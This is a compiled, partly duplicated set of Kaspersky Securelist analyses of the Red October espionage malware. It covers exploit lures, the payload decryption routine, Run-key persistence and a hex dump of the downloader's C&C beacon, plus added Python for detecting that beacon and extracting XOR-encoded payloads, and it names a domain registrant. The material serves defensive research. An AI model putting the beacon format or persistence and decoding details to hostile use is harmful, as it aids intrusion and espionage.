
Red October. Detailed Malware Description


Red October - Java Exploit Delivery Vector Analysis - Securelist
Source: http://www.securelist.com/en/blog/208194086/Red_October_Java_Exploit_Delivery_Vector_Analysis

GReAT, Kaspersky Lab Expert
Posted January 16, 13:00 GMT
Tags: Targeted Attacks, Cyber espionage, Vulnerabilities and exploits, Spearphishing

Red October - Java Exploit Delivery Vector Analysis

Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage of another delivery vector in the Red October attacks.

In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), known as the 'Rhino' exploit (CVE-2011-3544).

We know they would have used this technique in the early February 2012 timeframe, and this exploit use is consistent with their approach in that it's not 0-day. Most likely, a link to the site was emailed to potential victims, and the victim systems were running an outdated version of Java.

However, it seems that this vector was not heavily used by the group. When we downloaded the PHP script responsible for serving the '.jar' malcode archive, the line of code delivering the Java exploit was commented out. Also, the related links, Java code, and the executable payload are proving difficult to track down at this point.

The domain involved in the attack is presented only once in a public sandbox at malwr.com (http://malwr.com/analysis/c3b0d1403ba35c3aba8f4529f43fb300/), and only on February 14th, the very same day that they registered the domain hotinfonews.com:

Domain Name: HOTINFONEWS.COM
Registrant:
Privat Person
Denis Gozolov ([email protected])
Narva mnt 27
Tallinn
Tallinn, 10120
EE
Tel. +372.54055298
Creation Date: 14-Feb-2012
Expiration Date: 14-Feb-2013

Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike the many other Red October components.

We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days, then didn't need the effort any longer. This may also tell us that this group, which meticulously adapted and developed their infiltration and collection toolset to their victims' environment, had a need to shift to Java from their usual spearphishing techniques in early February 2012. And then they went back to their spear phishing.


Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connecting with a governmental economic research institute in the Middle East.

So, this Java Rhino exploit appears to be of limited use. And the functionality embedded in the server-side PHP script that delivers this file is very different from the common and related functionality that we see in the backdoors used throughout the five year campaign.

The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt the URL strings within the exploit is delivered within the Java applet itself. Here is the PHP encryption routine from that script, used to encrypt the URL for the downloader content:

And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter 'p':

Here is the code within the applet that consumes the encrypted strings and uses them. The resulting functionality downloads the file from the URL and writes it to 'javaln.exe'. Notice that the strb and stra variables hold the same strings as the $files and $charset variables in the PHP script:

This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in "hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed on the victim's machine. A description of that downloader follows. It is most interesting that this exploit/php combination's encryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggests that this limited-use package was potentially developed separately from the rest for a specific target.

2nd stage of the attack: EXE, downloader
The second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed by the payload of the Java exploit. It acts as a downloader for the next stage of the attack.

Known file location: %TEMP%\javaln.exe
MD5: c3b0d1403ba35c3aba8f4529f43fb300

The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscation layer, the same as used in many Red October modules.

Obfuscation layer disassembled

The module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists. After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically on startup:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
JavaUpdateSln=%full path to own executable%

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
JavaUpdateSln=%full path to own executable%

Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds it sends a HTTP POST request to the following sites:

Page 4: Red october. detailed malware description

www.microsoft.com
update.microsoft.com
www.google.com

Once a valid connection is established, it continues to its main loop.

C&C server connection loop
Every 180 seconds the module sends a HTTP POST request to its C&C server. The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php

The body of the POST request has the following format:

id=%unique user ID, retrieved from the overlay of the file%
&A=%integer, indicates whether the autorun registry key was written%
&B=%0 or 1, indicates if user has administrative rights%
&C=%integer, level of privilege assigned to the current user%

00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.|
00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne|
00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas|
00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H|
00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin|
00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C|
00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6|
00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:|
00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w|
00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod|
000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395|
000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026|
000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB|
000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1|
000000e0 26 43 3d 32 |&C=2|

HTTP POST request sent to the C&C server
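The beacon above is what a proxy or IDS would see every 180 seconds. As an added example (not code from the report or from Kaspersky), the following Python rebuilds the request from the report's hex dump, parses the id/A/B/C body, and applies a small indicator check a defender could run over captured HTTP requests; the indicator list and the GET request used as a negative case are my own construction.

```python
import re
from urllib.parse import parse_qs

# The javaln.exe beacon exactly as dumped in the report, embedded here so the
# example runs offline (copied from the page, not captured by this code).
BEACON_HEXDUMP = """\
00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.|
00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne|
00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas|
00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H|
00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin|
00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C|
00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6|
00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:|
00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w|
00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod|
000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395|
000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026|
000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB|
000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1|
000000e0 26 43 3d 32 |&C=2|
"""

# "offset  xx xx ... |ascii|" lines, one to sixteen bytes each
_HEX_LINE = re.compile(r"^[0-9a-fA-F]{8}((?: [0-9a-fA-F]{2}){1,16}) \|")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild the raw bytes from a hex dump in the format printed in the report."""
    raw = bytearray()
    for line in dump.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _HEX_LINE.match(line)
        if not m:
            raise ValueError(f"not a hexdump line: {line!r}")
        raw += bytes.fromhex("".join(m.group(1).split()))
    return bytes(raw)


def parse_http_request(raw: bytes) -> dict:
    """Minimal HTTP/1.0 request parser: request line, lower-cased headers, raw body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def content_length_matches(req: dict) -> bool:
    """Sanity check: declared Content-length equals the bytes actually sent."""
    declared = req["headers"].get("content-length")
    return declared is not None and declared.isdigit() and int(declared) == len(req["body"])


def parse_beacon_fields(body: bytes) -> dict:
    """Split the id/A/B/C form body described in the report into a flat dict."""
    text = body.decode("ascii", "replace")
    return {k: v[0] for k, v in parse_qs(text, keep_blank_values=True).items()}


def javaln_beacon_indicators(req: dict) -> list:
    """Reasons this request matches the javaln.exe beacon; empty list means no match."""
    reasons = []
    path = req["target"].split("?", 1)[0]
    if req["method"] == "POST" and path.endswith("/reportdatas.php"):
        reasons.append("POST to /reportdatas.php")
    host = req["headers"].get("host", "").rsplit(":", 1)[0]
    if host == "www.dailyinfonews.net":
        reasons.append("hardcoded C&C host www.dailyinfonews.net")
    if req["headers"].get("content-type") == "application/x-www-form-urlencoded":
        fields = parse_beacon_fields(req["body"])
        # exactly the four fields, with A/B/C numeric as the report describes
        if set(fields) == {"id", "A", "B", "C"} and all(fields[k].isdigit() for k in "ABC"):
            reasons.append("id/A/B/C form body")
    return reasons


if __name__ == "__main__":
    request = parse_http_request(hexdump_to_bytes(BEACON_HEXDUMP))
    print(parse_beacon_fields(request["body"]))
    print(javaln_beacon_indicators(request))
```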

The module decrypts the C&C response with the AMPRNG algorithm using a hardcoded key. Then, it checks if there is a valid EXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to "%TEMP%\nvsvc%p%p.exe" (%p depends on system time) and executes it.

3rd stage of the attack: EXE, unknown
Currently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe" downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits.

Conclusions
As more information about Red October becomes available and third parties are publishing their own research into the attacks, it becomes clear that the scope of the operation is bigger than originally thought.

In addition to the Java exploit presented here, it's possible that other delivery mechanisms were used during the 5 years this gang has been active. For instance, we haven't seen any PDF exploits yet, which are very popular with other groups - an unusual thing.

We will continue to monitor the situation and publish updates as the story unfolds.


“Red October”. Detailed Malware Description 1. First Stage of Attack - Securelist
Source: http://www.securelist.com/en/analysis/204792265/Red_October_Detailed_Malware_Description_1_First_Stage_of_Attack

“Red October”. Detailed Malware Description 1. First Stage of Attack
First stage of attack

1. Exploits
2. Dropper
3. Loader Module
4. Main component

Second stage of attack
1. Modules, general overview
2. Recon group
3. Password group
4. Email group
5. USB drive group
6. Keyboard group
7. Persistence group
8. Spreading group
9. Mobile group
10. Exfiltration group

1. Exploits
Based on the analysis of known cases, we identified two main ways through which Backdoor.Win32.Sputnik infects the victims. Both methods rely on spear-phishing e-mails which are sent to the prospective victims. The e-mails contain an attachment which is either an Excel or Word document, with enticing names. In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), known as the 'Rhino' exploit (CVE-2011-3544).


The Red October infection diagram

The Excel-based exploit - CVE-2009-3129
This is the oldest known way for Red October to infect computers.

A list of some of the Excel file names can be found below:

File name: MD5:

Katyn_-_opinia_Rosjan.xls bd05475a538c996cd6cafe72f3a98fae

WORK PLAN (APRIL-JUNE 2011).xls f16785fc3650490604ab635303e61de2

EEAS-Staff New contact list (05-25-2011).xls 5f9b7a70ca665a54f8879a6a16f6adde

"tactlist_05-05-2011_.8634.xls EEAS New contact list (05-05-2011).xls " bb2f6240402f765a9d0d650b79cd2560

Agenda Telefoane institutii si ministere 2011.xls 4bfa449f1a351210d3c5b03ac2bd18b1

Agenda Telefoane institutii si ministere 2011 (2).xls 4ce5fd18b1d3f551a098bb26d8347ffb

FIEO contacts update.xls ec98640c401e296a76ab7f213164ef8c

spisok sotrudnikov.xls d98378db4016404ac558f9733e906b2b

List of shahids.xls dc4a977eaa2b62ad7785b46b40c61281


Spravochnik.xls 5ecec03853616e13475ac20a0ef987b6

Agenda Telefoane&Email institutii si ministere 2011.xls de56229f497bf51274280ef84277ea54

EEAS New contact list (05-05-2011) (2).xls 396d9e339c1fd2e787d885a688d5c646

FIEO contacts update.xls 7e5d9b496306b558ba04e5a4c5638f9f

Telephone.xls c42627a677e0a6244b84aa977fbea15d

List of shahids.xls 1f86299628bed519718478739b0e4b0c

BMAC Attache List - At 11 Oct_v1[1].XLS f0357f969fbaf798095b43c9e7a0cfa7

MERCOSUR_Imports.xls 50bd553568422cf547539dd1f49dd80d

Cópia de guia de telefonos (2).xls cee7bd726bc57e601c85203c5767293c

Programme de fetes 2011.xls ceac9d75b8920323477e8a4acdae2803

12 05 2011 updated.xls 639760784b3e26c1fe619e5df7d0f674

telefonebi.xls d71a9d26d4bb3b0ed189c79cd24d179a

telefonebi.xls dc8f0d4ecda437c3f870cd17d010a3f6

The Excel based exploit is detected by Kaspersky products as Trojan-Dropper.MSWord.Agent.ga. It was apparently used mostly in 2011, with several samples being uploaded to VirusTotal by the victims. For detection results from various products, check:

https://www.virustotal.com/file/afaebb8055559ea6bf88cedcd6fc7b93f02cde31a560876bcc4860fd0686739d/analysis

Several detections include:

Kaspersky Trojan-Dropper.MSWord.Agent.ga 20120808

McAfee Exploit-MSExcel.u 20120808

Microsoft Exploit:Win32/CVE-2009-3129 20120808

Symantec Bloodhound.Exploit.306 20120808

TrendMicro HEUR_OLEXP.B 20120808

The Excel file properties for all the exploits indicate it has been edited on a system with Simplified Chinese Excel. The exploit appears to have been compiled on 26 Nov 2009:

EXIF METADATA
=============
MIMEType : application/vnd.ms-excel
Company :
ModifyDate : 2009:11:26 03:35:15
TitleOfParts : Sheet1
SharedDoc : No
Author :
CodePage : Windows Simplified Chinese (PRC, Singapore)
Title :
AppVersion : 11.9999
LinksUpToDate : No
ScaleCrop : No
LastModifiedBy : qq
HeadingPairs : ??????, 1
HyperlinksChanged : No
CreateDate : 1996:12:17 01:32:42
Security : None
FileType : XLS
Software : Microsoft Excel

The exact exploit type used by Red October in the XLS files is CVE-2009-3129.

Exploit (CVE-2009-3129) information:
“Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Office 2004 and 2008 for Mac; Open XML File Format Converter for Mac; Office Excel Viewer 2003 SP3; Office Excel Viewer SP1 and SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a spreadsheet with a FEATHEADER record containing an invalid cbHdrData size element that affects a pointer offset, aka "Excel Featheader Record Memory Corruption Vulnerability."”

US-CERT info: https://www.us-cert.gov/cas/techalerts/TA09-314A.html

Patch: http://technet.microsoft.com/en-us/security/bulletin/ms09-nov

The vulnerability exploited by the Red October XLS dropper has been patched by Microsoft in November 2009.

The CVE-2009-3129 exploit and shellcode

Shellcode decryptor in XLS files

The Red October XLS CVE-2009-3129 exploit appears to have been originally developed by Chinese hackers. It was also used in other, unrelated attacks against Tibetan activists and other entities. Its main purpose is to drop and execute a Trojan, which for Red October is in the range of 500-600kB.

The shellcode receives control upon successful exploitation of the vulnerability and proceeds to decrypt itself. Once decrypted, the shellcode in turn decrypts the main malware body, which is stored in the Excel file at offset 0x6600 in encrypted form:


Encrypted malware payload in XLS files

The malware is encrypted with a simple XOR+ROR algorithm:

void decrypt(unsigned char *tbuf, unsigned long n, int round)
{
    unsigned char b;
    long i;
    unsigned short ecx = 0x400;        /* XOR counter: starts at 0x400, decremented per byte */
    unsigned char a;
    a = 6;                             /* rotate-right amount */
    for (i = 0; i < 1024; i++) {       /* only the first 1024 bytes are touched; n and round are unused */
        b = tbuf[i];
        b = b ^ ecx;                   /* XOR with the low byte of the counter (truncated to 8 bits) */
        b = (b >> a) | (b << (8 - a)); /* rotate right by 6 bits (truncated to 8 bits on store) */
        tbuf[i] = b;
        ecx--;
    }
}

The shellcode writes the main “top” Trojan dropper to a file named “Dcs.tmp” and runs it. It will also extract a dummy Excel file which will be shown to the user if the exploit was successful. The dummy Excel is named “~ .xls”.

The Word-based exploit – CVE-2010-3333
The CVE-2010-3333 Word-based exploit (RTF files) has been observed in September and October 2012. Example filename / MD5 list related to the attack:

File name: MD5:

arexeio1.doc cb51ef3e541e060f0c56ac10adef37c3

Popa Tatiana -plîngere.doc 6B23732895DAAAD4BD6EAE1D0B0FEF08

La Política de Defensa y el Poder Naval en México OTAN (1).doc 44E70BCE66CDAC5DC06D5C0D6780BA45

Iran, Syria and the balance of power in the Middle East.doc 9F470A4B0F9827D0D3AE463F44B227DB

Diplomatic Staff list.doc 91EBC2B587A14EC914DD74F4CFB8DD0F


Diplomatic Car for Sale - MB 2000.doc 85BAEBED3D22FA63CE91FFAFCD7CC991

Rulers have hostaged parliament to further their personal interest (1).doc B9238737D22A059FF8DA903FBC69C352

Итоги президенства В.Януковича.doc 2672FBBA23BF4F5E139B10CACC837E9F

the wife of Ambassador-2.doc 65D277AF039004146061FF01BB757A8F

Вожможные стратегические решения.doc 731C68D2335E60107DF2F5AF18B9F4C9

31086823_cm04639-re02 en12.doc 9B55887B3E0C7F1E41D1ABDC32667A93

16 октября 2012 года (дополнение).doc A7330CE1B0F89AC157E335DA825B22C7

delegat.doc FC3C874BDAEDF731439BBE28FC2E6BBE

Davos2011_follow-up plan_heregjilt.doc 9950A027191C4930909CA23608D464CC

Participant list 6th Forum 09-12 update.doc C78253AEFCB35F94ACC63585D7BFB176

Draft 3_Conference Renewable energy cooperation and Grid integration.doc 5D1121EAC9021B5B01570FB58E7D4622

The Word based exploit is detected by Kaspersky products as Exploit.MSWord.CVE-2010-3333.bw. It was apparently used mostly in 2012 (e.g. October 2012), with one sample being uploaded to VirusTotal, probably by one of the victims. For detection results from various products, check:

https://www.virustotal.com/file/5fe53a960bc2031a185c575ea05ac466f26739a34c651c14260e4cfbc123e87f/analysis/

Several detections include:

Kaspersky Exploit.MSWord.CVE-2010-3333.bw 20121012

McAfee - 20121012

Microsoft Exploit:Win32/CVE-2010-3333 20121012

Symantec - 20121012

TrendMicro - 20121012

The dropper is in fact an RTF file, with “author John Doe”, supposedly created by “mocrosoft office word Msfedit5.1.21.2500”.

The same exploit / dropper have been observed in many other targeted attacks, for instance against Tibetan activists. It appears to be of Chinese origin, just as the XLS exploit.

The exact exploit type used by Red October in these RTF files is CVE-2010-3333.

Exploit (CVE-2010-3333) information:
“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."”

MITRE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333
CERT: http://www.us-cert.gov/cas/techalerts/TA10-313A.html
Microsoft: http://technet.microsoft.com/en-us/security/bulletin/ms10-nov

The vulnerability exploited by Red October’s RTF documents was patched by Microsoft in November 2010.

The CVE-2010-3333 exploit and shellcode


The RTF file acts as a dropper for the main Trojan body. It also contains a fake document which is shown to the user in case the exploit is successful.

Encrypted trojan body inside RTF files

The main Trojan body is encrypted “XOR 0xFB” and stored as hex text inside the RTF file. The shellcode decrypts the main body and executes it.

The Word-based exploit – CVE-2012-0158
In November 2012 we noticed new attacks using document files that exploit CVE-2012-0158. This exploit has been extremely popular with APT attacks during 2012, so it’s perhaps no surprise it was also adopted by the Red October gang.

Example filename / MD5 list related to the attack:

File name: MD5:

Mazda.doc 93d0222c8c7b57d38931cfd712523c67

Komorowski.doc 51edea56c1e83bcbc9f873168e2370af

Commercial Report for October.doc 114ed0e5298149fc69f6e41566e3717a

Russian terrorist attack.doc 350c170870e42dce1715a188ca20d73b

FLOC-meeting.doc 4daa2e7d3ac1a5c6b81a92f4a9ac21f1

3037.doc 82e518fb3a6749903c8dc17287cebbf8

8th_2012 Minutes of meeting.doc 3ded9a0dd566215f04e05340ccf20e0c

The CVE-2012-0158 exploit used in these attacks is mostly undetected by antivirus products at the time of writing of this report. Kaspersky Lab products catch and block the exploit using the state of the art “Automatic Exploit Prevention” technology.

The same exploit / dropper have been observed in many other targeted attacks, for instance against Tibetan activists. It appears to be of Chinese origin, just as the other exploits.

The exact exploit type used by Red October in these RTF files is CVE-2012-0158.

Exploit (CVE-2012-0158) information:


“The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."”

NIST: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158
Microsoft: http://technet.microsoft.com/en-us/security/bulletin/ms12-027

The vulnerability exploited by these Red October RTF documents was patched by Microsoft in April 2012.

The CVE-2012-0158 exploit and shellcode
The RTF file acts as a dropper for the main Trojan body. It also contains a fake document which is shown to the user in case the exploit is successful.

Encrypted Trojan dropper body in RTF files with CVE-2012-0158

The main Trojan body is encrypted “XOR 0xDE” and stored as hex text inside the RTF file. The shellcode simply writes the main dropper to a file named “msmx21.exe” in the %TEMP% folder and runs it. It also extracts a fake document which is shown to the victim if the exploit has been successful.
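Both RTF droppers (XOR 0xFB for CVE-2010-3333 above, XOR 0xDE here) store the Trojan as single-byte-XORed hex text, so one extraction routine covers both. The Python below is an added example, not code from the report: it pulls long hex runs out of an RTF, derives the XOR key from the expected "MZ" header rather than hardcoding it (so it generalizes to any single-byte key), and confirms the result by following e_lfanew to the PE signature. The RTF wrapper, decoy text and fake PE are constructed here; it assumes the hex blob is whitespace-delimited from the surrounding RTF text.

```python
import re
import struct


def extract_hex_blobs(rtf: bytes, min_pairs: int = 64) -> list:
    """Return every run of at least `min_pairs` hex byte pairs in the RTF, decoded to bytes.

    Whitespace (including line breaks) between pairs is allowed, as RTF hex text wraps.
    """
    pattern = re.compile(rb"(?:[0-9A-Fa-f]{2}\s*){%d,}" % min_pairs)
    blobs = []
    for m in pattern.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(0))
        blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def derive_xor_key(blob: bytes):
    """Single-byte key under which the blob starts with 'MZ', or None if no such key."""
    key = blob[0] ^ ord("M")
    return key if (blob[1] ^ key) == ord("Z") else None


def looks_like_pe(data: bytes) -> bool:
    """MZ header whose e_lfanew (offset 0x3C) points at a 'PE\\0\\0' signature inside the buffer."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_embedded_pe(rtf: bytes):
    """Find the XOR-encoded Trojan body in an RTF lure; returns (key, pe_bytes) or None."""
    for blob in extract_hex_blobs(rtf):
        key = derive_xor_key(blob)
        if key is None:
            continue
        decoded = xor_bytes(blob, key)
        if looks_like_pe(decoded):
            return key, decoded
    return None


def make_sample_pe(size: int = 600) -> bytes:
    """Constructed fake PE: DOS header with e_lfanew = 0x40, then 'PE\\0\\0' and filler."""
    dos_header = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)
    return dos_header + b"PE\x00\x00" + bytes((i * 13) & 0xFF for i in range(size - 68))


def build_sample_rtf(pe: bytes, key: int) -> bytes:
    """Constructed lure: RTF wrapper, decoy text, and the PE XORed with `key` as wrapped hex text."""
    hex_text = xor_bytes(pe, key).hex().encode("ascii")
    wrapped = b"\r\n".join(hex_text[i:i + 64] for i in range(0, len(hex_text), 64))
    return (b"{\\rtf1\\ansi\\deff0 {\\fonttbl {\\f0 Times New Roman;}}\r\n"
            b"\\f0\\fs24 Diplomatic Staff list (decoy text)\\par\r\n"
            b"{\\object\\objemb{\\*\\objdata " + wrapped + b"}}\r\n}")


if __name__ == "__main__":
    lure = build_sample_rtf(make_sample_pe(), 0xDE)
    key, pe = recover_embedded_pe(lure)
    print(f"recovered {len(pe)}-byte PE with XOR key 0x{key:02X}")
```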


Fake document shown to the victim if exploit is successful

The Java based exploit - CVE-2011-3544
Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage of another delivery vector in the Red October attacks.

In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), known as the 'Rhino' exploit (CVE-2011-3544).

We know they would have used this technique in the early February 2012 timeframe, and this exploit use is consistent with their approach in that it's not 0-day. Most likely, a link to the site was emailed to potential victims, and the victim systems were running an outdated version of Java.

However, it seems that this vector was not heavily used by the group. When we downloaded the PHP script responsible for serving the '.jar' malcode archive, the line of code delivering the Java exploit was commented out. Also, the related links, Java code, and the executable payload are proving difficult to track down at this point.

The domain involved in the attack is presented only once in a public sandbox at malwr.com (http://malwr.com/analysis/c3b0d1403ba35c3aba8f4529f43fb300/), and only on February 14th, the very same day that they registered the domain hotinfonews.com:

Domain Name: HOTINFONEWS.COM
Registrant:
Privat Person
Denis Gozolov ([email protected])
Narva mnt 27
Tallinn
Tallinn, 10120
EE
Tel. +372.54055298
Creation Date: 14-Feb-2012
Expiration Date: 14-Feb-2013

Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike the many other Red October components.

We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days, then didn't need the effort any longer. This may also tell us that this group, which meticulously adapted and developed their infiltration and collection toolset to their victims' environment, had a need to shift to Java from their usual spearphishing techniques in early February 2012. And then they went back to their spear phishing.

Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connecting with a governmental economic research institute in the Middle East.

So, this Java Rhino exploit appears to be of limited use. And the functionality embedded in the server-side PHP script that delivers this file is very different from the common and related functionality that we see in the backdoors used throughout the five year campaign.

The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt the URL strings within the exploit is delivered within the Java applet itself. Here is the PHP encryption routine from that script, used to encrypt the URL for the downloader content:

And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter 'p':

Here is the code within the applet that consumes the encrypted strings and uses them. The resulting functionality downloads the file from the URL and writes it to 'javaln.exe'. Notice that the strb and stra variables hold the same strings as the $files and $charset variables in the PHP script:


This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in "hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed on the victim's machine. A description of that downloader follows. It is most interesting that this exploit/php combination's encryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggests that this limited-use package was potentially developed separately from the rest for a specific target.

2nd stage of the Java exploit attack: EXE, downloader
The second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed by the payload of the Java exploit. It acts as a downloader for the next stage of the attack.

Known file location: %TEMP%\javaln.exe
MD5: c3b0d1403ba35c3aba8f4529f43fb300

The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscation layer, the same as used in many Red October modules.


Obfuscation layer disassembled

The module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists. After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically on startup:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
JavaUpdateSln=%full path to own executable%

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
JavaUpdateSln=%full path to own executable%

Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds it sends a HTTP POST request to the following sites:

www.microsoft.com
update.microsoft.com
www.google.com

Once a valid connection is established, it continues to its main loop.

C&C server connection loop
Every 180 seconds the module sends a HTTP POST request to its C&C server. The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php

The body of the POST request has the following format:


id=%unique user ID, retrieved from the overlay of the file%
&A=%integer, indicates whether the autorun registry key was written%
&B=%0 or 1, indicates if user has administrative rights%
&C=%integer, level of privilege assigned to the current user%

00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.|
00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne|
00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas|
00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H|
00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin|
00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C|
